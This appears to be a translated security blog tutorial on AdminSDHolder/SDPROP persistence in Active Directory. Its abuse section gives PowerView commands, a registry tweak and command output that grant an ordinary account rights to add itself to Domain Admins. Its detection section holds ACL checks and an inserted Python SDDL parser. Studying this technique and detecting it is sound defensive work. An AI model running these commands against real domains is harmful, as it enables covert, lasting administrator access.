0x00 Introduction

AdminSDHolder is a container in AD that holds an ACL template. The background process SDPROP (Security Descriptor propagator) runs every 60 minutes by default and resets the ACLs of protected accounts and groups (such as the Domain Admins group) to the ACL stored on AdminSDHolder, so that the security permissions of these critical objects cannot be tampered with. Modifying the AdminSDHolder ACL requires Domain Admin privileges; the modified ACL is then applied automatically by SDPROP to all protected AD accounts and groups, which is what makes it a domain persistence mechanism.

References:

AdminSDHolder, Protected Groups and SDPROP

Appendix C: Protected Accounts and Groups in Active Directory

Domain Penetration: AdminSDHolder

AD Permissions Attack #3: Persistence using AdminSDHolder and SDProp

Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights

0x01 AdminSDHolder Overview

AdminSDHolder, Protected Groups and SDPROP

Appendix C: Protected Accounts and Groups in Active Directory

Active Directory Domain Services uses AdminSDHolder, protected groups and Security Descriptor propagator (SD propagator or SDPROP for short) to secure privileged users and groups from unintentional modification. This functionality was introduced in the inaugural release of Active Directory in Windows 2000 Server and it's fairly well known. However, virtually all IT administrators have been negatively impacted by this functionality, and that will continue unless they fully understand how AdminSDHolder, protected groups and SDPROP work. Each Active Directory domain has an object called AdminSDHolder, which resides in the System container of the domain. The AdminSDHolder object has a unique Access Control List (ACL), which is used to control the permissions of security principals that are members of built-in privileged Active Directory groups (what I like to call "protected" groups). Every hour, a background process runs on the domain controller that holds the PDC Emulator operations master role. It compares the ACL on all security principals (users, groups and computer accounts) that belong to protected groups against the ACL on the AdminSDHolder object. If the size or the binary string is different, the security descriptor on the object is overwritten by the security descriptor from the AdminSDHolder object. As you can see, multiple layers of security are incorporated into this functionality. First, the permissions applied to users belonging to protected groups are more stringent than the default permissions applied onto other user accounts. Next, the default behaviour is that inheritance is disabled on these privileged accounts, ensuring that permissions applied at the parent level aren't inherited by the protected objects, regardless of where they reside. Finally, the background process running every 60 minutes identifies manual modifications to an ACL and overwrites them so that the ACL matches the ACL on the AdminSDHolder object.

AdminSDHolder resides at "CN=AdminSDHolder,CN=System". It holds a template that strictly defines the security access permissions of protected accounts and groups, and inheritance is disabled on it. Every 60 minutes the background process SDPROP compares the ACLs of protected accounts and groups with the ACL on AdminSDHolder and makes sure they match.

Common protected accounts and groups include:
  • Account Operators
  • Administrator
  • Administrators
  • Backup Operators
  • Domain Admins
  • Domain Controllers
  • Enterprise Admins
  • Krbtgt
  • Print Operators
  • Read-only Domain Controllers
  • Replicator
  • Schema Admins
  • Server Operators
The full list of protected accounts and groups can be found in Appendix C: Protected Accounts and Groups in Active Directory; certain accounts and groups can also be excluded from the protected list by configuration. Consequently, if the AdminSDHolder ACL is modified to grant an ordinary account Full Control, SDPROP then pushes that ACL to the protected groups, and the ordinary account gains the right to, for example, add accounts to protected groups. A note on AdminCount: Kerberoasting queries for accounts with AdminCount=1 because protected accounts and groups carry the special marker AdminCount=1. Bear in mind that once a user is removed from a privileged group, its adminCount value stays at 1, but Active Directory no longer treats it as a protected object.

0x02 Abusing AdminSDHolder

1. PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Modify the AdminSDHolder ACL

  Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" -PrincipalIdentity "win10" -Rights All

Trigger SDPROP

1) Wait for the scheduled run
By default SDPROP runs every 60 minutes. The interval can be changed through the registry value below (here set to 600 seconds), but this is not recommended because it affects domain controller performance.

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 600

2) Trigger manually with ldp.exe

Appendix C - Protected Accounts and Groups in Active Directory

3) Trigger manually with a PowerShell command

https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1

  Invoke-ADSDPropagation -TaskName RunProtectAdminGroupsTask -Verbose

Persistence

After SDPROP has run, inspect the properties of the Domain Admins group: the win10 account now has permission to modify it.

  C:\WINDOWS\system32>net groups "domain admins" win10 /domain /add
  The request will be processed at a domain controller for domain ring2.com.
  The command completed successfully.

  C:\WINDOWS\system32>net user win10 /domain
  The request will be processed at a domain controller for domain ring2.com.
  User name win10
  Full Name win10
  Comment
  User's comment
  Country/region code 000 (System Default)
  Account active Yes
  Account expires Never
  Password last set 9/3/2020 9:49:35 PM
  Password expires Never
  Password changeable 9/4/2020 9:49:35 PM
  Password required Yes
  User may change password Yes
  Workstations allowed All
  Logon script
  User profile
  Home directory
  Last logon 12/26/2020 6:54:24 PM
  Logon hours allowed All
  Local Group Memberships
  Global Group memberships *Domain Admins *Domain Users
  The command completed successfully.

The new group membership only takes effect after the win10 account logs on again.

Cleanup

  PS C:\Users\Administrator\Desktop> Remove-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" -PrincipalIdentity "win10" -Rights All -Verbose
  VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=RING2,DC=COM
  VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
  (&(|(|(samAccountName=win10)(name=win10)(displayname=win10))))
  VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=RING2,DC=COM
  VERBOSE: [Get-DomainObject] Extracted domain 'ring2.com' from 'CN=AdminSDHolder,CN=System,DC=ring2,DC=com'
  VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=ring2,DC=com
  VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
  (&(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=ring2,DC=com)))
  VERBOSE: [Remove-DomainObjectAcl] Removing principal CN=win10,CN=Users,DC=ring2,DC=com 'All' from
  CN=AdminSDHolder,CN=System,DC=ring2,DC=com
  VERBOSE: [Remove-DomainObjectAcl] Granting principal CN=win10,CN=Users,DC=ring2,DC=com rights GUID
  '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=ring2,DC=com
  True

2. DCShadow + AdminSDHolder

The first method has to be executed on the DC; combining DCShadow with AdminSDHolder makes it possible to maintain access remotely. See the DCShadow analysis article.

0x03 Detection

Check the ACL on AdminSDHolder for suspicious principals:

  # PowerShell (ADSI): dump the security descriptor as SDDL and decode it
  $AdminSDHolder = [adsi]'LDAP://CN=AdminSDHolder,CN=System,DC=ring2,DC=com'
  $AdminSDHolder.ObjectSecurity.SDDL | ConvertFrom-SddlString

  # PowerView: list each trustee and the rights it holds on the object
  Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" | Select-Object SecurityIdentifier,ActiveDirectoryRights -Unique
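To turn the SDDL string produced by the ADSI command above into a pass/fail check, the following added Python example (not code from the original article) parses the DACL and flags every allow ACE that grants GenericAll, WriteDacl or WriteOwner to a trustee outside an assumed baseline of SYSTEM, Domain Admins, Enterprise Admins and Administrators. It handles both the two-letter and the hex form of the rights field; the sample SDDL, the placeholder property GUID and the injected user SID are constructed.

```python
import re

# Assumed baseline (not from the article): trustees with legitimate full control on
# AdminSDHolder in a default domain (SY=SYSTEM, DA=Domain Admins, EA=Enterprise Admins,
# BA=Administrators). Adjust it from a known-good DC export before relying on it.
BASELINE_TRUSTEES = {"SY", "DA", "EA", "BA"}
# Rights that let a trustee rewrite the object, its DACL or its owner.
DANGEROUS_RIGHTS = {"GA", "WD", "WO"}
HEX_RIGHT_BITS = {"GA": 0x10000000, "WD": 0x00040000, "WO": 0x00080000}

def rights_tokens(rights):
    """Expand an SDDL rights field (two-letter codes or hex mask) into a set."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in HEX_RIGHT_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}

def parse_dacl(sddl):
    """Return the ACEs in the D: (DACL) section; the S: (SACL) part is ignored."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        f = body.split(";")
        if len(f) >= 6:  # ace_type;flags;rights;object_guid;inherit_guid;sid
            aces.append({"type": f[0], "rights": rights_tokens(f[2]),
                         "object_guid": f[3], "trustee": f[5]})
    return aces

def find_suspicious_aces(sddl):
    """Allow ACEs that grant GA/WD/WO to a trustee outside the baseline."""
    hits = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA"):
            continue  # deny ACEs cannot add privilege
        granted = ace["rights"] & DANGEROUS_RIGHTS
        if granted and ace["trustee"] not in BASELINE_TRUSTEES:
            hits.append({"trustee": ace["trustee"], "rights": sorted(granted)})
    return hits

# Constructed sample modelled on a default AdminSDHolder DACL, with one injected
# ACE (the last) giving full control to an ordinary user's constructed SID.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)(A;;LCRPLORC;;;AU)"
    "(OA;;RPWP;11111111-1111-1111-1111-111111111111;;BA)"  # placeholder GUID
    "(A;;GA;;;S-1-5-21-1000000000-2000000000-3000000000-1105)"
)
```

Running `find_suspicious_aces($AdminSDHolder.ObjectSecurity.SDDL)` against a real export should return an empty list; any hit names a trustee that was added to the template and will be propagated by SDPROP.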

Original article:

[Windows Domain] AdminSDHolder